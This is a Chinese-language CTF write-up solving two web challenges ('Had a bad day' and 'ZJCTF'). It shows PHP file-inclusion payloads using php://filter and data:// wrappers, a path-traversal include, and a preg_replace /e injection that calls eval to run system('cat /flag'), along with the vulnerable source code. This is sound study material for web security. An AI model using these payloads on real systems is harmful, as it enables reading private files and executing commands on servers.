[BSidesCF 2020]Had a bad day 1
可能存在SQL注入或者文件包含,试试用filter伪协议读取index.php文件
/index.php?category=php://filter/read=convert.base64-encode/resource=index.php
报错了
的确是文件包含,但是有index.php却读取错误,报错显示无法打开流:操作失败,结果把.php后缀去掉,可以读取
/index.php?category=php://filter/read=convert.base64-encode/resource=index
从源码把那一段整下来,发现最后有==,猜想是base64编码,试了下果然解码出了源文件,其中有一段关键的
<?php
$file = $_GET['category'];
if(isset($file))
{
if( strpos( $file, "woofers" ) !== false || strpos( $file, "meowers" ) !== false || strpos( $file, "index")){
include ($file . '.php');
}
else{
echo "Sorry, we currently only support woofers and meowers.";
}
}
?>
传入的category需要有woofers,meowers,index
才能包含传入以传入名为文件名的文件,我们要想办法包含flag.php
尝试直接读取/index.php?category=woofers/../flag
出现了别的内容,包含成功了flag.php,但是这里也说了flag需要读取
利用php://filter伪协议可以套一层协议读取flag.php
/index.php?category=php://filter/convert.base64-encode/index/resource=flag
套一个字符index
符合条件并且传入flag,读取flag.php
又出了一串码,解码后得到flag
[BJDCTF2020]ZJCTF,不过如此 1
代码审计:
1.用get得到$text和 $file变量
2. $text变量中得有I have a dream这一段文本
3. $file如果有/flag/关键词,就不行
4. 有一个next.php路径
试下伪协议
index.php?text=data://text/plain,I have a dream&file=php://filter/convert.base64-encode/resource=next.php
把返回的代码用base64解码
<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;
function complex($re, $str) {
return preg_replace(
'/(' . $re . ')/ei',
'strtolower("\\1")',
$str
);
}
foreach($_GET as $re => $str) {
echo complex($re, $str). "\n";
}
function getFlag(){
@eval($_GET['cmd']);
}
/next.php?\S*=${getFlag()}&cmd=system('cat /flag');